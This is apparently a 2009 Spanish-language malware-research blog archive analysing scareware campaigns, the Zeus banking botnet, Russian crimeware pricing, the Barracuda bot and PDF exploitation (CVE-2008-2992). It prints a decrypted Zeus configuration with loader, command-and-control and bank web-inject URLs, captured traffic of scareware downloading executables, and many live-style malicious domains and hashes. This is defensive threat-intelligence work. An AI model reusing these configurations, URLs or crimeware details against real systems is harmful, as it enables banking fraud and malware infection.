Founder of MalwareIntelligence, a site dedicated to research on all matters relating to anti-malware security, criminology computing and information security in general, always from a perspective closely related to the field of intelligence.

martes, 31 de marzo de 2009

Compendio mensual de información. Marzo 2009

Pistus Malware Intelligence Blog
30.03.09 Ingeniería Social visual para la propagación de malware
29.03.09 Una recorrida por los últimos scareware V
27.03.09 Entidades financieras en la mira de la botnet Zeus. Segunda parte
26.03.09 Barracuda Bot. Botnet activamente explotada
25.03.09 Entidades financieras en la mira de la botnet Zeus. Primera parte
23.03.09 Automatización de procesos antianálisis a través de crimeware
13.03.09 Campaña de infección scareware a través de falso explorador de Windows
11.03.09 Los precios del crimware ruso
09.03.09 Estrategia de infección agresiva de XP Police Antivirus. Segunda parte
07.03.09 Explotación de vulnerabilidades a través de archivos PDF
06.03.09 Unique Sploits Pack. Crimware para automatizar la explotación de vulnerabilidades
05.03.09 Estrategia de infección agresiva de XP Police Antivirus
03.03.09 Phishing Kit. Creador automático de sitios fraudulentos
01.03.09 Campaña de propagación de XP Police Antivirus a través de Ingeniería Social Visual


EvilFingers Blog
30.03.09 Financial institutions targeted by the botnet Zeus. Part two
27.03.09 Financial institutions targeted by the botnet Zeus. Part one
26.03.09 Automating processes anti-analysis through of crimeware
22.03.09 Campaign scareware infection through false Windows Explorer
13.03.09 Russian prices of crimeware
11.03.09 Aggressive strategy of XP Police Antivirus infection. Second part
08.03.09 Exploitation of vulnerabilities through PDFs
06.03.09 Aggressive strategy of XP Police Antivirus infection
04.03.09 Phishing Kit. Creator automatic of fraudulent sites
02.03.09 Whitepaper. Analysis of an attack of web-based malware
01.03.09 Campaign spreading XP Antivirus Police through Visual Social Engineering

ESET Latinoamérica Blog
27.03.09 Descarga de malware a través de páginas de cracks
25.03.09 Presencia de ESET en Centroamérica
12.03.09 Falsos correos de Movistar y Claro propagan malware
04.03.09 Supuestos sitios de música descargan malware
02.03.09 ESET inicia Gira 2009 de Seguridad Antivirus en Internet

Información relacionada
Compendio mensual de información. Febrero 2009
Compendio mensual de información. Enero 2009

# pistus

Ver más

lunes, 30 de marzo de 2009

Ingeniería Social visual para la propagación de malware

Los métodos de engaño forman una pieza fundamental dentro de las estrategias de diseminación de códigos maliciosos; sobre todo, del tipo troyanos ya que necesitan de la intervención del factor humano para cumplir con efectividad sus objetivos.

Si bien el empleo de Ingeniería Social visual no representa un método para nada innovador, sigue siendo altamente explotado por delincuentes informáticos con el ánimo de lograr que usuarios desprevenidos activen (con doble clic) el malware.

Teniendo en cuenta estas características, la pregunta que inmediatamente suena en la cabeza es, si no se trata de un método novedoso ¿por qué existe un alto porcentaje de infección a través de este tipo de engaños?

Quizás, una de las claves que permitan responder la pregunta sea la gran demanda de material pornográfico a través de Internet. "Cómo así" diría un amigo centroamericano :-)

Una de las características principales de la Ingeniería Social visual, radica en la explotación de sitios web que prometen contenidos multimedia, siendo la pornografía uno de los tópicos más buscado en Internet y, en consecuencia, uno de los más habituales de explotar a través de esta técnica.

Un ejemplo concreto lo representan las falsas páginas de PornTube, donde se promete visualizar un supuesto video, utilizando como carnada una imagen del supuesto video, junto a la necesidad de instalación de un códec que, claro esta, se trata de un malware y no de un códec.

A continuación expongo algunas de las URL's empleadas para difundir esta estrategia, pero hay que tener en cuenta que la cantidad de dominios empleados por los delincuentes que se encuentran detrás, es muchísimo más larga.

watch-videos .cn
7wmv .in
alll-online.com/pl/pl .php
stumbulepon .com
video.stumbulepon .com
watch-video .info
yuotnbe .com
yuotuhe .com
world-tube .biz
hothotvideo .com
video-go .net
get-new.mee.fgu.name/sudofe .html
sandpaper-type.mee.fgu.name/qurer .html
free-avg.mee.fgu.name/qusthalyene .html

Una cuestión de oferta y demanda, quienes suelen visitar sitios pornográficos, quieren consumir pornografía. No importa que el material se presente en formato imagen o video, ni que en medio del supuesto video se solicite la instalación de diez "códec"; quien quiere pornografía hará todo lo posible por obtenerla sin medir los potenciales riesgos de seguridad que ello, muchas veces, implica.

Información relacionada
Estrategia de infección agresiva de XP Police Antivirus
Campaña de propagación de XP Police Antivirus a través de Ingeniería Social Visual
Propagación masiva de malware en falsos códecs
Técnicas de engaño que no pasan de moda


# pistus

Ver más

domingo, 29 de marzo de 2009

Una recorrida por los últimos scareware V

Cada vez es mas el caudal de códigos maliciosos tipo scareware, o rogue, que azotan Internet deplegando estrategias de engaño cada vez más elaboradas, y cuyo código es sometido constantemente a la manipulación por parte de sus creadores para entorpedecer la detección por parte de las compañías AV.

Algunos de los scareware que se conocieron durante el último mes son:

Antivirus 2009 Protection
MD5: fc6d3c36579907e3234d11e45aaff32e
IP: 91.211.64.47

Russian Federation Russian Federation Ural Industrial Limited Company

Plataforma: Windows

Dominios Asociados

bestantcomputerprotection .com


VT Report: 30/39 (76.93%)

Spyware Filter
MD5: 43aab2992405b0aefd7f895ceb3051b6
IP: 92.62.101.123

Estonia Estonia Tallinn Starline Web Services

Plataforma: Windows

Dominios Asociados

spw-fighter .com
, spwfighter .com, spyware-fighter .com, spyware-fight .com, spywarefighter2009 .com, swwfight .com, swwfight .net, scandalmature .com, searchmysites .com, sexdvds .ru, spylee .com

VT Report: 3/39 (7.7%)

Malware Defender 2009
MD5: afdff49097316d0a3e1b5c518c308f84
IP: 67.43.237.75

Ukraine Ukraine Olexij Khrenov

Plataforma: Windows

Dominios Asociados
malwaredefender2009 .com
, systemguard2009 .com, systemguard2009m .com

VT Report: 32/40 (80.00%)


Win PC Defender
(Clonación de XP Police Antivirus)

MD5: b6bc68b2343669779ac8097b8ab1fd21
IP: 213.163.65.10
Netherlands Netherlands Rotterdam Interactive 3d
Plataforma: Windows
Dominios Asociados
win-pc-defender .com, loyaltube .com, msjoinpayment .com, rakompoporyadkunazaryadku .com, iloveyourbrain .com, loyaltube .com, loyaltube09 .com, loyaltube10 .com, setupdatdownload .com, velzevuladmin .com, xp-police-09 .com, xp-police-2009 .com, xp-police-antivirus .com, xp-police-av .com, xp-police-engine .com

VT Report: 18/39 (46.15%)

Search and Destroy
MD5: 8fb526b68a826cd3c87f0bf39a22c8df
IP: 68.178.212.133

United States United States Scottsdale Godaddy.com Inc

Plataforma: Windows
Dominios Asociados
search-and-destroy .com



SysCleaner Pro
MD5: 243062dfaaa21513cee37d14351b4644
IP: 64.191.12.38
United States United States Scranton Network Operations Center Inc

Plataforma: Windows
Dominios Asociados
syscleanerpro .com, system-cleanerpro .com, totalantispyware .com, totalantispyware .net, totalantispyware2009 .com

VT Report: 1/39 (2.57%)


Spy Fighter
IP: 74.52.155.194
United States Texas - Dallas - Theplanet.com Internet Services Inc
Plataforma: Windows

Dominios Asociados
spy-fighter .com

11ox .com
1getcarinsurance .info



Renus 2008
MD5: da071a820af815e85ddded315d5cd919
IP: 88.214.202.5
United Kingdom United Kingdom Real International Business Corp
Plataforma: Windows
Dominios Asociados
renus2008 .com, byboard .com, intop .name, katorga .com, rudvd.com .ru

VT Report: 23/39 (58.97%)

Antivirus Agent Pro
MD5: ddf7db23b6f4b4db13cfd07da733a7e7
IP: 82.146.49.35
United States Florida - Crystal River - Ispsystem At Nac
Plataforma: Windows
Dominios Asociados
avagentpro .com

VT Report: 19/39 (48.72%)

En cada uno de los casos presentados, se agrega los respectivos dominios asociados a cada scareware. Esta información es útil para el bloqueo de dominios maliciosos.

Información relacionada

Ver más

viernes, 27 de marzo de 2009

Entidades financieras en la mira de la botnet Zeus. Segunda parte

La estructura de Zeus está constituida por módulos en php desde los cuales controla y ejecuta todas las acciones fraudulentas y dañinas para la cual fue concebido. Así, por ejemplo, es muy común encontrar archivos del tipo s.php, sS.php, x.php o similares que se encargan del control de comandos (C&C) de la bot.

Una vez establecida la infección, Zeus descarga un archivo cifrado del tipo .bin (generalmente cfg.bin) que es precisamente el archivo que especifica la configuración junto a una serie de instrucciones que indican el tipo de información que debe recolectar y dónde enviar.


Cuando este archivo es descifrado, podemos ver la configuración y las entidades financieras de las cuales Zeus realizará un monitoreo constante desde la zombi.


De esta manera, cuando el usuario accede a determinados formularios, Zeus intercepta la interacción en el browser capturando toda la información que su botmaster necesita para materializar el fraude.

La lista de entidades que se encuentran en la mira de Zeus es realmente larga, sin embargo, algunas de ellas son:

myspace.com
gruposantander.es
vr-networld-ebanking.de
finanzportal.fiducia.de
bankofamerica.com
bbva.es
bancaja.es
olb2.nationet.com
online.lloydstsb.co.uk
pastornetempresas.bancopastor.es
bancopopular.es
ebay.com
us.hsbc.com
e-gold.com
online.wellsfargo.com
wellsfargo.com
paypal.com
usbank.com
citizensbankonline.com
onlinebanking.nationalcity.com
suntrust.com
53.com
web.da-us.citibank.com
bancaonline.openbank.es
extranet.banesto.es
empresas.gruposantander.es
bbvanetoffice.com
bancajaproximaempresas.com
citibank.de
probanking.procreditbank.bg
ibank.internationalbanking.barclays.com
online-offshore.lloydstsb.com
dab-bank.com
hsbc.co.uk
bancoherrero.com
intelvia.cajamurcia.es
caixasabadell.net
areasegura.banif.es
privati.internetbanking.bancaintesa.it
iwbank.it
cardsonline-consumer.com
money.yandex.ru
e-gold.com
paypal.com


Estas estrategias maliciosas representan graves amenazas y dejan en evidencia que, aunque el correo electrónico todavía constituye un canal muy explotado para la propagación de malware, hoy es Internet quien funciona como base de ataques masivos a través de diferentes crimeware.

# pistus

Ver más

jueves, 26 de marzo de 2009

Barracuda Bot. Botnet activamente explotada

Los procesos delictivos llevados a cabo por delincuentes informáticos a través de la explotación de diferentes aplicaciones crimeware concebidas para estos fines, cobran cada vez mayor notoriedad debido a la cantidad de casos que se conocen en la actualidad, donde códigos maliciosos diseminados a través de redes bot se encargan de formar el camino para los ataques y de continuar reclutando zombis.

Barracuda bot es una nueva alternativa para los delincuentes que, además de caracterizarse por permitir realizar las acciones comunes de cualquier botnet, posee funcionalidades particulares que la transforman en una "herramienta delictiva" que permite "adaptarse a las necesidades del delincuente".

Barracuda bot es una botnet, de origen ruso con interfaz en inglés, completamente modular donde cada módulo se encarga de una tarea específica, ofreciendo la posibilidad de actualizar o añadir módulos dependiendo de las funcionalidades que se desean agregar para controlar las zombis.


De esta manera, el delincuente puede ir comprando los módulos en función de las acciones delictivas que desea cometer, de manera sencilla, a través de un panel de control y administración vía web.


Por otra parte, incorpora funcionalidades de "seguridad" como el cifrado de la información que transmite la bot, y la capacidad de restablecer su "negocio" a través de un sistema de gestión de emergencia que reacciona en caso de alguna caída, permitiendo seguir con la administración de la bot a través de IRC.

Entre las funcionalidades más importantes que incorpora esta botnet se encuentran: la posibilidad de descargar y ejecutar binarios .exe y .dll, no infectar nuevamente máquinas previamente infectadas, cifrado y polimorfismo, entre tantas otras más.

Pero sin lugar a dudas, lo llamativo de esto, y lo que refleja que las actividades delictivas llevadas a cabo por Internet constituyen un verdadero negocio.


El crimeware tiene un valor de U$S 1600 en su versión full; es decir, todos los módulos, pero ofreciendo también una versión menor de U$S 1000 que incorpora todos los módulos excepto el de DDoS (Denegación de Servicio Distribuido).


Los clientes de barracuda bot reciben asesoramiento y soporte gratuito; incluso, también propone un modelo de licenciamiento atípico en estas actividades. La venta se encuentra limitada a cinco (5) personas, las actualizaciones sufren un 60% de descuento y con la compra de dos (2) módulos se accede a un descuento del 10% en la compra del próximo.


Los módulos que se pueden adquirir por el momento son:
  • Módulo DDoS. Mediante el cual se puede hacer: HTTP GET/POST flood, UDP flood, ICMP flood, TCP flood, IP Spoofing. Su valor es de U$S 900.
  • Módulo Email Grabber. Permite recopilar direcciones de correo electrónico del HD, recopilar direcciones de correo electrónico de la libreta de direcciones de diferentes clientes, y capturar direcciones en tiempo real cada vez que se accede a Internet. Su valor es de U$S 600.
  • Módulo Proxy. Permite aumentar el número de conexiones simultáneas para un más "eficaz" envío de spam, entre otras acciones a nivel estadístico. Su valor es de U$S 500.
  • Módulo PWDGRAB. Netamente orientado al robo de información sensible como contraseñas de sitios web, cuentas de correo electrónico, cuentas de FTP, etc. El valor del mismo es de U$S 500.
  • Módulo SSLSOCKS. Este módulo se encuentra en su etapa beta y permite "construir una VPN" en la misma bot. Su costo es de U$S 500.

Ver más

miércoles, 25 de marzo de 2009

Entidades financieras en la mira de la botnet Zeus. Primera parte

Como ya he comentado en anteriores post, Zeus es una de las redes de computadoras zombi más importantes debido al gran número de nodos que conforman su red, y si bien su origen data de fines del 2007, en la actualidad se encuentra explotando malware de manera activa y masiva, ampliando su cobertura de ataques y actividades fraudulentas, administrando cada nodo a través de una interfaz web.

Tal es así que entre sus actividades se encuentran, además de la propia acción maliciosa de infección, activar todo un arsenal de scripts dañinos cuyos propósitos se canalizan en la infección masiva de equipos a través de troyanos, explotar diferentes vulnerabilidades conocidas, realizar ataques de phishing bajo el método de clonación de sitios web de diferentes entidades bancarias a nivel global y diferentes sistemas que ofrecen servicios pagos en línea.

Sabiendo este punto fundamental del propósito de Zeus centrado en un alto porcentaje de robo de información, la pregunta concreta que suponemos luego de leer estos breves párrafos es: ¿de qué manera obtiene Zeus la información que necesita del equipo víctima?


La respuesta a esta incógnita se encuentra en su archivo de configuración, el cual se encuentra cifrado. Una vez descifrado, el contenido de este archivo de configuración es similar al siguiente ejemplo real que muestra la información contenida en el archivo cfg.bin
(MD5: 905dfab98b33e750bf78c8b29765279b):
Config version: 1.0.3.7
Loader url: http://yourcatfree.cn/trashes/ldr.exe

Server url: http://theyourbest.cn/rssfeederd/stat1.php

Advanced config 1: http://greatyourway.cn/trashesgg2/cfg.bin

Advanced config 2: http://theyourown.cn/trashesff1/cfg.bin

Advanced config 3: http://adviceswarning.com/trashesrr5/cfg.bin

Advanced config 4: http://ispspartners.com/trashes6/cfg.bin

Advanced config 5: http://ispscenter.com/trashesrr3/cfg.bin

Advanced config 6: http://alleips.com/trashestt3/cfg.bin

Fake 1: 0 PG http://adultfriendfinder.com/go*|http://centralet.cn/1/1.php|291351|

Fake 2: 0 PG http://adultfriendfinder.com/search/g*|http://centralet.c
/1/1.php|291351|

Fake 3: 0 PG http://adultfriendfinder.com/search/p*|http://centralet.cn/1/1.php|291351|

Fake 4: 0 PG http://adultfriendfinder.com/cgi-bin/public/page.cgi?p=affiliate_multi*|http://centralet.cn/1/1.php|291351|

Fake 5: 0 PG http://staging.adultfriendfinder.com/search/g*|http://centralet.cn/1/1.php|291351|

Fake 6: 0 PG http://staging.adultfriendfinder.com/search/p*|http://centralet.cn/1/1.php|291351|

Fake 7: 0 PG http://www.adultfriendfinder.com/go*|http://centralet.cn/1/1.php|291351|

Fake 8: 0 PG http://www.adultfriendfinder.com/search/g*|http://centralet.cn/1/1.php|291351|

Fake 9: 0 PG http://www.adultfriendfinder.com/search/p*|http://centralet.cn/1/1.php|291351|

Fake 10: 0 PG http://www.adultfriendfinder.com/cgi-bin/public/page.cgi?p=affiliate_multi*|http://centralet.cn/1/1.php|291351|

Fake 11: 0 PG http://www.staging.adultfriendfinder.com/search/g*|http://centralet.cn/1/1.php|291351|

Fake 12: 0 PG http://www.staging.adultfriendfinder.com/search/p*|http://centralet.cn/1/1.php|291351|

Inject data 1: OK

Inject data 2: OK

Inject data 3: OK

Inject data 4: OK

Inject data 5: OK

Inject data 6: OK

Inject data 7: OK

Inject data 8: OK

Inject 1: https://www.e-gold.com/acct/balance.asp*|GPL|*|*

Inject 2: https://online.wellsfargo.com/das/cgi-bin/session.cgi*|GL|*|*

Inject 3: https://www.wellsfargo.com/*|G|*|*

Inject 4: https://online.wellsfargo.com/login*|GP|*|*

Inject 5: https://online.wellsfargo.com/signon*|GP|*|*

Inject 6: https://www.paypal.com/*/webscr?cmd=_account|GL|*|*

Inject 7: https://www.paypal.com/*/webscr?cmd=_login-done*|GL|*|*

Inject 8: https://www.gruposantander.es/bog/sbi*?ptns=acceso*|GP|*|*

Done!

De esta manera, y por intermedio de configuraciones avanzadas que explotan en el equipo víctima, el troyano de zeus logra obtener información sensible.

# pistus

Ver más

lunes, 23 de marzo de 2009

Automatización de procesos antianálisis a través de crimeware

La automatización de códigos maliciosos constituye una filosofía de vida y un negocio redondo para sus creadores ya que día a día deben enfocar sus esfuerzos en idear nuevas "herramientas" que permitan "saltar" los métodos de detección propuestos por las firmas antivirus.

Tal es así que constantemente aparecen nuevas "propuestas", cada vez más profesionalizadas, que ayudan a demorar la detección de códigos maliciosos a través de técnicas antianálisis y, al mismo tiempo, aumentar las ganancias de sus desarrolladores.


CRUM Cryptor Polymorphic
es uno de los tantos programas que forman parte de esta categoría. Es un programa utilizado en ambientes maliciosos para cifrar malware; desarrollo en Rusia por personas que se encuentran en el lado malicioso del campo para ampliar el horizonte de ganancias; y el cual he mencionado de manera superficial al referirme al crimeware ruso.

Se trata de una nueva versión de este crypter, exactamente la 1.1, que ofrece capacidades polimórficas para la manipulación de código dañino.

Entre las características polimórficas que propone la aplicación se encuentran, además del mismo polimorfismo:

  • Uso de registros aleatorios
  • Cifrado de importaciones y recursos
  • Códificación de 128 para cada sección
  • Sobreescritura de los campos "Rich" y "Time/Date Stamp" de la cabecera de los archivos
  • Ofrece capacidades antidebugger
  • Evita que se lleve a cabo un volcado de memoria
  • Evitar ejecución en entornos controlados
  • Cambiar o borra el icono del binario malicioso
Aquí sólo se reúnen sólo algunas de las funcionalidades ofrecidas por el programa, pero suficientes para determinar que el grado de profesionalismo y peligrosidad alcanzado, en este caso por desarrolladores rusos, en la creación de aplicaciones maliciosas es preocupante.

Esta aplicación cuesta U$S 100 en el mercado negro. Sin embargo, para completar el arsenal de aplicaciones de este estilo, el mismo creador ofrece por "sólo" U$S 50 un joiner (utilizado la fusión de archivos) llamado CRUM Joiner Polymorphic y por U$S 20 se accede a las actualizaciones del mismo.


La interfaz de este programa, que permite fusionar varios archivos como por ejemplo, a un .jpg fusionarle un binario .exe, se ve de la siguiente manera:


En este caso, algunas de las características que incorpora la aplicación son:
  • Capacidades polimórficas
  • Permite la unión de ilimitados archivos
  • Soporta varias extensiones de archivos como .doc, .mp3, .avi, .jpg, .bmp y .exe
  • Cifrado de archivos de 256 bytes
  • Capacidad de ejecutar no sólo archivos .exe sino que también archivos .dll
En ambos casos, el creador recomienda algunas "medidas de seguridad" para resguardar la "integridad" del desarrollo como no someter la aplicación a servicios como virustotal, ser ordenado al cifrar los archivos y no compartir ninguno de los componentes que constituyen las aplicaciones.

Información relacionada

Los precios del crimeware ruso

Unique Sploits Pack. Crimeware para automatizar la explotación de vulnerabilidades

Creación Online de malware polimórfico basado en PoisonIvy


# pistus

Ver más

viernes, 13 de marzo de 2009

Campaña de infección scareware a través de falso explorador de Windows

Las estrategias de engaño son la principal característica que emplea el scareware para generar temor en el usuario y lograr la ejecución de su instalador. Si bien las excusas que se emplean para los engaños son muchas, algunas más llamativas que otras, cada vez se percibe más un claro aumento de los esfuerzos por idear y crear estrategias más sofisticadas.

En este caso, el engaño se encuentra focalizado en presentar un scaneo online del equipo que siempre termina encontrando problemas de infección, ofreciendo la descarga de la supuesta herramienta de seguridad que solucionará los problemas. Todo completamente falso.

Cuando el usuario accede por primera vez a la página maliciosa, una alerta advierte sobre la potencial posibilidad de que nuestro equipo haya sido víctima de códigos maliciosos.

En este momento se produce la simulación de un scaneo del equipo que es representado a través de un falso explorador de windows y un gif animado que muestra la barra de progreso indicando el avance del scan, para luego desplegar una ventana emergente con la nomenclatura de las supuestas amenazas encontradas en el sistema.

Esta imagen, que ofrece dos opciones ("Remove all" y "Cancel") constituye otra capa del engaño, ya que sin importar en que sector de la imagen se haga clic, produce el mismo efecto: descarga el instalador del malware. Un archivo llamado install.exe cuyo MD5 es 8eed59709de00e8862d6ce3d5e19cb4a.

Algunas de las direcciones web que se encuentran activamente explotando esta actividad maliciosa son:

stabilityaudit.com (209.44.126.22)

websscan.com
goscanbay.com (78.159.101.27)

goanyscan.com
goscanever.com
goscanfuse.com

goscanit.com

goscanonly.com

goscanslot.com

gowayscan.com

in4co.com

in4ik.com

megascan4.com

www.goscanonly.com

www.homescan4.com

easywinscanner17.com (209.249.222.48)

fast-antimalware-scanner.com (194.165.4.7)

fastantimalwarescan.com (78.47.91.153)


Sin embargo, el profesionalismo que buscan sus creadores se va perfeccionando intentando cubrir la mayor cantidad de "público" posible desplegando la estrategia de infección en varios idiomas.

Incluso, descargando variantes del mismo malware. De esta manera, los creadores del scareware intentan cubrir los dos idiomas más empleados a nivel mundial como lo son el inglés y el español.

Ver más

miércoles, 11 de marzo de 2009

Los precios del Crimeware ruso

Al ver la cantidad de dominios rusos creados para diseminar malware, y la gran variedad de aplicaciones diseñadas desde aquellas tierras para cometer diferentes tipos de delitos que buscan quedarse con la mercancía más valiosa: la información; imagino a Rusia como si fuese algo parecido al mundo que describe Gibson en Neuromante donde viejas callejuelas oscuras son utilizadas para la venta y alquiler clandestino de todo tipo de programas diseñados para romper las protecciones de seguridad.

Los delincuentes informáticos y el mercado negro de crimeware parecería estar a la orden del día en Rusia. Con lo cual, quiero reflejar algunos números que dan una idea de lo que puede llegar a costar preparar ataques a través de un importante número de “recursos” disponibles, como diría un mercenario, al mejor postor.


Sploit 25

Es un crimeware que contiene diferentes exploit para vulnerabilidades en Internet Explorer 6 y 7, y en archivo PDF. Existe una versión Lite cuyo valor es de U$S 1500 y U$S 2500 la versión Pro.


Unique Sploits Pack

Otro crimeware que contiene varios exploits para diferentes vulnerabilidades. Su valor es de U$S 600. Por U$S 100 se accede a las actualizaciones y por U$S 50 al un módulo de cifrado.


Neon Exploit System

Un conjunto de exploits diseñados para explotar las vulnerabilidades en plataformas Microsoft y diferentes aplicativos de uso masivo. El valor de este crimeware es de U$S 500.


XS[S]hkatulka

Conjunto de script diseñados para romper contraseñas de webmails a través de XSS. Según sus creadores, la aplicación “es ideal para comenzar a ganar dinero mediante la prestación de servicios para obtener las contraseñas de las cuentas de correo. Como el investigador de Investigaciones Informáticas. :-) Su valor es de U$S 110.


Cripta Zeus(a)
Es un servicio cuyo fin es cifrar los troyanos que reclutan zombies PC’s para la botnet Zeus. Los “servicios” ofrecidos son:
  • Construir criptas individuales (your.exe) la primera vez: U$S 49
  • Construir criptas individuales (your.exe) cifrar cada dos horas: U$S 46
  • Construir criptas individuales (your.exe) cifrar cada tres horas: U$S 43
Le Fiesta Pack
Uno de los crimeware más conocidos. Al igual que otros programas similares, se encuentra escrito en PHP y es utilizado para explotar vulnerabilidades a través de técnicas como Drive-by-Download, Scripting, etc. Actualmente es utilizado por la botnet Zeus. El precio de la última versión es de U$S 1000.


YES Exploit System

Otro crimeware diseñado para explotar vulnerabilidades a través de exploit y scripts. Su valor es de U$S 600.


PoisonIvy Polymorphic Online Builder

Crimeware para generar variantes del troyano PoisonIvy en línea. Su valor es de U$S 500.


FriJoiner Small y Private
Una aplicación desarrollada para fusionar archivos ejecutables. Este tipo de aplicaciones es ampliamente utilizada por los diseminadores de malware para evitar que el código malicioso sea detectado. La versión Small cuesta U$S 10 y la versión Private U$S 15.





Genom iframer

Aplicativo diseñado para automatizar la inyección de etiquetas iframe en sitios vulnerables. Su valor es de U$S 40.


CRUM Cryptor Polymorphic

Cripter con características polimórficas pensado para evitar la detección de malware por parte de las compañías antivirus. Su costo de de U$S 100.
Esta es sólo una pequeña lista que representa un porcentaje ínfimo comparado con la cantidad y variedad de aplicaciones crimeware.

La mayoría de los ataques que utilizan Internet como base para atacar se llevan a cabo con programas de este estilo; sin embargo, debemos ser concientes que mientras más informados nos encontremos y mejor utilicemos las tecnologías de seguridad, mayor será el nivel de protección en nuestros entornos de información.


Información relacionada

Unique Sploits Pack. Crimeware para automatizar la explotación de vulnerabilidades

Creación Online de malware polimórfico basado en PoisonIvy


# pistus

Ver más

lunes, 9 de marzo de 2009

Estrategia de infección agresiva de XP Police Antivirus. Segunda parte

Desde el momento que se produce la infección de XP Police Antivirus, el usuario comenzará a visualizar en pantalla una serie de ventanas emergentes de alertas sobre falsas infecciones, entre otras.

Pero de manera completamente transparente, se van produciendo una serie de acciones tendientes a completar la obra del scareware.


A través de la escucha del tráfico, vemos la descarga de los siguientes componentes:

GET /setupc.dat HTTP/1.1
User-Agent: MS_Update32
Host: setupdatdownload.com

Descarga setup.dat que no es un archivo de datos sino que es un archivo comprimido que guarda una copia de los otros archivos que se descomprimen en C:\Archivos de programa\XPPoliceAntivirus.
GET /sysupdate.exe HTTP/1.1
User-Agent: MS_Update32
Host: setupdatdownload.com

Descarga sysupdate.exe (MD5: 36e13b0624dbd4bc973d1fd5f949ebe0) es utilizado para comprimir el malware en tiempo de ejecución para intentar evitar su detección por parte de programas antivirus.
GET /svchost32.exe HTTP/1.1
User-Agent: MS_Update32
Host: setupdatdownload.com

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 28 Feb 2009 12:47:46 GMT
Content-Type: application/octet-stream
Last-Modified: Fri, 27 Feb 2009 16:01:17 GMT
Accept-Ranges: bytes
Content-Length: 2746314
Connection: Keep-Alive
Age: 0

MZ......................@...............................................!..L.!This program cannot be run in DOS mode.

GET /land.txt HTTP/1.1
User-Agent: wget 3.0
Host: xp-police-09.com
Cache-Control: no-cache

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 28 Feb 2009 12:51:15 GMT
Content-Type: text/plain
Last-Modified: Mon, 02 Feb 2009 20:53:00 GMT
ETag: "3a58001-1-bd70a300"
Accept-Ranges: bytes
Content-Length: 1
Connection: Keep-Alive
Age: 0

2

GET /js/window.js HTTP/1.1
Accept: */*
Referer: http://www.xp-police-09.com/installed.php?id=108
Accept-Language: es
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.xp-police-09.com
Connection: Keep-Alive
Cookie: id=108

El JavaScript windows.js despliega en pantalla la ventana pop-up con la leyenda Thank you for Installation!


GET /buy.php?id=108 HTTP/1.1
Accept: */*
Accept-Language: es
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.xp-police-09.com
Connection: Keep-Alive
Cookie: id=108

Esta es la página de compra del scareware desde donde se solicita información sensible y financiera de la víctima. Es un scam/phishing.

Las maniobras empleadas por los códigos maliciosos son cada vez más agresivas y eficaces en cuanto a sus acciones ya que, como se pudo apreciar, el instalador que se descarga en primera instancia, es sólo una parte del rompecabezas desde el cual el scareware obtiene las demás piezas.

Información relacionada

Estrategia de infección agresiva de XP Police Antivirus

Campaña de propagación de XP Police Antivirus a través de Ingeniería Social Visual

Una recorrida por los últimos scareware IV


# pistus

Ver más

sábado, 7 de marzo de 2009

Explotación de vulnerabilidades a través de archivos PDF

Explotar debilidades en determinadas aplicaciones de uso masivo, es en la actualidad uno de los vectores de ataque por malware más empleados; y en este sentido ya he posteado la explotación de vulnerabilidades varias a través de SWF y JS.

En este caso, el objetivo del atacante es encontrar equipos con Adobe Acrobat y Adobe Reader vulnerables a un ataque de Desbordamiento de Búfer (Buffer Overflow), descrito en CVE-2008-2992.

La cuestión es que, un ejemplo concreto lo constituye la dirección http://prororo7.net/sp/index .php. Al acceder a esta URL maliciosa, no se visualiza absolutamente nada pero, en segundo plano, el código exploit explotará el error mencionado en caso de encontrarlo.

En este ejemplo, se descarga y ejecuta de manera remota y arbitraria un malware a través del archivo f.pdf (MD5: 2de9de23f9db1e7b1e39d0481a372399) empleando la función util.printf de Java Script.

El código malicioso se manifiesta bajo el nombre load.exe (MD5: a6e317f29966fa9e2025f29c7d414c0a) y es descargado desde http://prororo7 .net/sp/l.php?b=4&s=P.

Lamentablemente, el archivo PDF es constantemente manipulado por quienes lo propagan para evitar la detección por parte de los programas antivirus, y porqué digo "lamentablemente", por que el índice de detección que este PDF malicioso posee hasta el momento es extremadamente bajo. Tal cual lo podemos observar en el reporte que devuelve VirusTotal, sólo cinco (5) compañías AV de un total de 39 previenen su infección.

Una situación similar se da con el archivo doc.pdf (MD5: 5fa343ebca2dd5a35b38644b81fe0485) que es llamado desde http://toureg-cwo .ch/fta/index.php, y que descarga el archivo 1.exe (MD5: 5c581054fbce67688d2666ac18c7f540) cuya tasa de detección es aún más baja que el anterior (4/39).

Muchas son las direcciones web que se están utilizando de manera activa para propagar malware:

tozxiqud .cn/nuc/spl/pdf .pdf
teirkmm .net/nuc/spl/pdf .pdf
hayboxiw .cn/nuc/spl/pdf .pdf
www.ffseik .com/nuc/spl/pdf .pdf
www.kuplon .biz/smun/pdf .php?id=2435&vis=1
www.geodll .biz/ar/spl/pdf.pdf
setcontrol .biz/ar/spl/pdf .pdf
newprogress .tv/fo/spl/pdf .pdf
eddii .ru/traffic/sploit1/getfile .php?f=pdf
google-analytics.pbtgr .ru/pdf .php?id=48462
hardmoviesporno .com/rf/exp/update1 .pdf

Como verán, las probabilidades de ser víctimas de este tipo de estrategias de infección es alta; en consecuencia, es de suma importancia parchear lo antes posible, quienes utilicen, las aplicaciones de Adobe.

Información relacionada
Explotando vulnerabilidades a través de SWF
Explotación de vulnerabilidades a través de JS


# pistus

Ver más

viernes, 6 de marzo de 2009

Unique Sploits Pack. Crimeware para automatizar la explotación de vulnerabilidades

El desarrollo de herramientas automatizadas para cometer diferentes actos delictivos y/o maliciosos (crimeware), es otro de los tantos negocios que se establecen en torno al mundo oscuro, y no tan oscuro, de lo informático.

Unique Pack es un ejemplo más. Un paquete de origen ruso diseñado para permitir explotar diferentes vulnerabilidades en muchas de las aplicaciones más utilizadas por los usuarios al precio de U$S 600, más U$S 100 cada actualización.

Los paquetes que incluye Unique Pack son:
  • Exploits para MDAC (recientemente actualizado) Office (actualizado) y otros que proporcionan la base de muestras para Internet Explorer desde la versión 4 hasta la 7, Opera 9 y Firefox.
  • Exploit para Adobe Reader. Vulnerabilidad CVE-2008-2992.
  • Exploits para PDF SPL (v.8.1.2 vulnerabilidad a partir del 05 noviembre de 2008) mejorado para su ejecución a través de Internet Explorer, Opera y Firefox.
  • Exploit para el navegador web Amaya 11.
